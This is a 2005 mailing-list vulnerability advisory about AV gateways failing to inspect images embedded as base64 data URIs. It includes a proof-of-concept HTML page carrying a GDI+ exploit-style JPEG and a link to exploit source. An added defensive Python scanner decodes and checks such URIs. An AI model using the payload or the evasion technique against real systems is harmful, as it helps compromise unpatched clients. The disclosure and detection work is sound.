[Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

From: Darren Bounds (dbounds_at_intrusense.com)
Date: 01/10/05

    Date: Mon, 10 Jan 2005 14:08:11 -0500
    To: full-disclosure@lists.netsys.com, bugs@securitytracker.com, vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, list@securiteam.com

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Multi-vendor AV gateway image inspection bypass vulnerability
    January 10, 2005

    A vulnerability has been discovered which allows a remote attacker to
    bypass anti-virus (as well as other security technologies such as IDS
    and IPS) inspection of HTTP image content.

    By leveraging the technique described in RFC 2397 for base64 encoding
    image content within the URL scheme, a remote attacker may encode a
    malicious image within the body of an HTML formatted document to
    circumvent content inspection.

    For example:

    http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

    The source code at the URL above will by default create a JPEG image
    that will attempt (and fail without tweaking) to exploit the Microsoft
    MS04-028 GDI+ vulnerability. The image itself is detected by all AV
    gateway engines tested (Trend, Sophos and McAfee); however, when the
    same image is base64 encoded using the technique described in RFC 2397
    (documented below), inspection is not performed and the image is
    delivered and rendered by the client.

    While Microsoft Internet Explorer does not support the RFC 2397 URL
    scheme, Firefox, Safari, Mozilla and Opera do, and will render the data
    and thus successfully execute the payload if the necessary OS and/or
    application patches have not been applied.

    ## BEGIN HTML ##

    <html>
    <body>
    <img
    src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
    gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
    /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
    QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
    CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
    AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
    MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
    AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
    oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
    ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
    yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
    AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
    QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
    ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
    xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
    Z">
    </body>
    </html>

    ## END HTML ##

    Solution:

    While AV vendor patches are not yet available, fixes for all currently
    known image vulnerabilities are, and have been for several months. If
    you have not yet applied them, you have your own negligence to blame.

    Contributions:

    Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
    platform testing.

    Thank you,

    Darren Bounds
    Intrusense, LLC.
    http://www.intrusense.com

    - --
    Intrusense - Securing Business As Usual
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.4 (Darwin)

    iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
    XT6MWYJOH3FmLfV3B1UfuJA=
    =82yy
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
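The gap the advisory describes is that a gateway scans the bytes of an image response but never looks inside an HTML response for an inline image. The following Python is an added example (not part of the advisory, and not any vendor's code) of the inspection step a gateway needs: it pulls every RFC 2397 `data:` URI out of URL-bearing attributes, decodes it (stripping the line wrapping browsers tolerate, exactly as in the posted HTML), identifies the real format from magic bytes, and flags a declared type that disagrees with the bytes. The decoded `payload` is what a gateway would then feed to the same engine it already runs on plain image responses. The sample HTML, the minimal JPEG/GIF headers and the `inspect_html`/`decode_data_uri` names are all constructed for this example.

```python
import base64
import binascii
import re
import urllib.parse
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

# Magic bytes for the image formats an inline image is likely to carry.
SIGNATURES = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
]

# RFC 2397 grammar: data:[<mediatype>][;base64],<data>
DATA_URI_RE = re.compile(r"^data:(?P<media>[^,]*?)(?P<b64>;base64)?,(?P<payload>.*)$",
                         re.IGNORECASE | re.DOTALL)

# Attributes that commonly carry a URL the client will fetch or render.
URL_ATTRS = {"src", "href", "data", "background", "poster"}


def sniff_type(blob: bytes) -> Optional[str]:
    """Identify an image by its leading bytes; None if no known signature matches."""
    for magic, mime in SIGNATURES:
        if blob.startswith(magic):
            return mime
    return None


def decode_data_uri(uri: str) -> Tuple[str, bytes]:
    """Split a data: URI into (declared media type, decoded bytes).
    Whitespace inside the base64 text is dropped, as browsers do, so a payload
    wrapped across several lines (like the one in the advisory) still decodes."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    # RFC 2397 default when no media type is given.
    media = (m.group("media") or "text/plain;charset=US-ASCII").split(";")[0]
    payload = m.group("payload")
    if m.group("b64"):
        compact = re.sub(r"\s+", "", payload)
        compact += "=" * (-len(compact) % 4)   # tolerate missing padding
        blob = base64.b64decode(compact)
    else:
        blob = urllib.parse.unquote_to_bytes(payload)
    return media.strip().lower(), blob


class DataURICollector(HTMLParser):
    """Collect every data: URI found in a URL-bearing attribute."""
    def __init__(self) -> None:
        super().__init__()
        self.uris: List[Tuple[str, str]] = []   # (tag, uri)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and value.lstrip().lower().startswith("data:"):
                self.uris.append((tag, value))


def inspect_html(html: str) -> List[Dict[str, object]]:
    """Return one finding per inline data: URI in the document.  A gateway hands
    each finding's 'payload' to the engine it runs on ordinary image responses;
    'mismatch' marks a declared image type that disagrees with the bytes, which
    on its own is a reason to block or quarantine the response."""
    collector = DataURICollector()
    collector.feed(html)
    findings: List[Dict[str, object]] = []
    for tag, uri in collector.uris:
        try:
            declared, blob = decode_data_uri(uri)
            sniffed = sniff_type(blob)
            findings.append({
                "tag": tag, "declared": declared, "sniffed": sniffed,
                "size": len(blob), "payload": blob, "decodable": True,
                "mismatch": declared.startswith("image/") and sniffed != declared,
            })
        except (ValueError, binascii.Error):
            # Undecodable data must not be waved through as "not an image".
            findings.append({"tag": tag, "declared": None, "sniffed": None, "size": 0,
                             "payload": b"", "decodable": False, "mismatch": True})
    return findings


# Constructed sample input (not the advisory's payload): a minimal JPEG header
# declared as image/gif, mirroring the advisory's HTML where a JPEG is labelled
# gif; a genuine GIF header; and a percent-encoded text blob.
_FAKE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              + b"\x00" * 24 + b"\xff\xd9")
_FAKE_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 10 + b";"


def _wrap(b64: str, width: int = 40) -> str:
    """Line-wrap base64 the way the advisory's HTML does."""
    return "\n".join(b64[i:i + width] for i in range(0, len(b64), width))


SAMPLE_HTML = f"""<html><body>
<img
src="data:image/gif;base64,{_wrap(base64.b64encode(_FAKE_JPEG).decode())}">
<img src="data:image/gif;base64,{base64.b64encode(_FAKE_GIF).decode()}">
<a href="data:,Hello%2C%20World">text</a>
</body></html>"""

if __name__ == "__main__":
    for f in inspect_html(SAMPLE_HTML):
        print(f["tag"], f["declared"], f["sniffed"], f["size"],
              "MISMATCH" if f["mismatch"] else "ok")
```

The point of sniffing rather than trusting the declared type is that the label in the URI is attacker-controlled; the advisory's own example declares `image/gif` while the bytes begin with the JPEG start-of-image marker. A gateway that only decoded `data:` URIs whose declared type it considered risky would miss exactly that case.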
